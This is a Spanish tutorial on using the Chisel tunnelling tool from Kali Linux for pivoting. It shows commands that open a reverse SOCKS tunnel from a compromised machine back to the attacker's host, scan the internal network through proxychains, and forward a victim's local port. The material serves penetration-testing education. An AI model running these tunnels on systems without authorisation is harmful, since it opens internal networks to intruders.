Hacking Pivoting kali linux chisel
Hacking Pivoting kali linux chisel
Chisel es una herramienta de tunelización rápida, escrita en Go, que permite encapsular tráfico TCP y UDP a través de HTTP y asegurarlo mediante SSH. En el mundo del Pentesting y Kali Linux, es extremadamente popular para realizar pivoting y evadir firewalls restrictivos.
A diferencia de otras herramientas, Chisel es un solo binario que funciona tanto como cliente como servidor.
1. Instalación en Kali Linux
Chisel ya se encuentra en los repositorios oficiales de Kali. Puedes instalarlo con el siguiente comando:
sudo apt update && sudo apt install chisel
Si necesitas los binarios para otras plataformas (como Windows o sistemas ARM) para transferirlos a una víctima, puedes instalar el paquete de binarios comunes:
sudo apt install chisel-common-binaries
Los encontrarás en /usr/share/chisel-common-binaries/.
2. Escenarios Comunes de Uso
A. Reverse SOCKS Proxy (Pivoting)
Este es el uso más frecuente: quieres acceder a toda la red interna desde tu máquina de Kali a través de una máquina comprometida.
En tu máquina (Kali - Servidor):
Bashchisel server --reverse --port 8080Esto levanta el servidor escuchando en el puerto 8080.
En la máquina comprometida (Cliente):
Bash./chisel client <TU_IP_KALI>:8080 R:socksEsto crea un túnel hacia tu Kali y levanta un proxy SOCKS5 (por defecto en el puerto 1080 de tu Kali).
Configuración en Kali:
Edita el archivo /etc/proxychains4.conf y añade al final:
Plaintextsocks5 127.0.0.1 1080Ahora puedes ejecutar herramientas como
nmapa través del túnel:proxychains nmap -sT -Pn 10.10.10.5.
B. Port Forwarding Local
Si quieres traer un puerto de la máquina víctima (que solo escucha localmente, como un panel de administración en el puerto 80) a tu Kali.
En Kali (Servidor):
Bashchisel server --port 8000En la víctima (Cliente):
Bash./chisel client <TU_IP_KALI>:8000 1234:127.0.0.1:80Ahora, si vas a
localhost:1234en tu navegador de Kali, estarás viendo el puerto 80 de la víctima.
3. Resumen de comandos útiles
| Comando | Función |
--reverse | Permite que el cliente dicte los túneles al servidor (indispensable para pivoting). |
-p, --port | Define el puerto donde escuchará el servidor. |
R:socks | Levanta un proxy SOCKS dinámico en el lado del servidor. |
R:80:127.0.0.1:80 | Mapea el puerto 80 del cliente al puerto 80 del servidor (Remote Forward). |
Recomendación de Seguridad
Cuando uses Chisel en entornos reales, recuerda que por defecto no requiere autenticación. Puedes añadir una capa de seguridad con el parámetro --auth usuario:contraseña tanto en el servidor como en el cliente.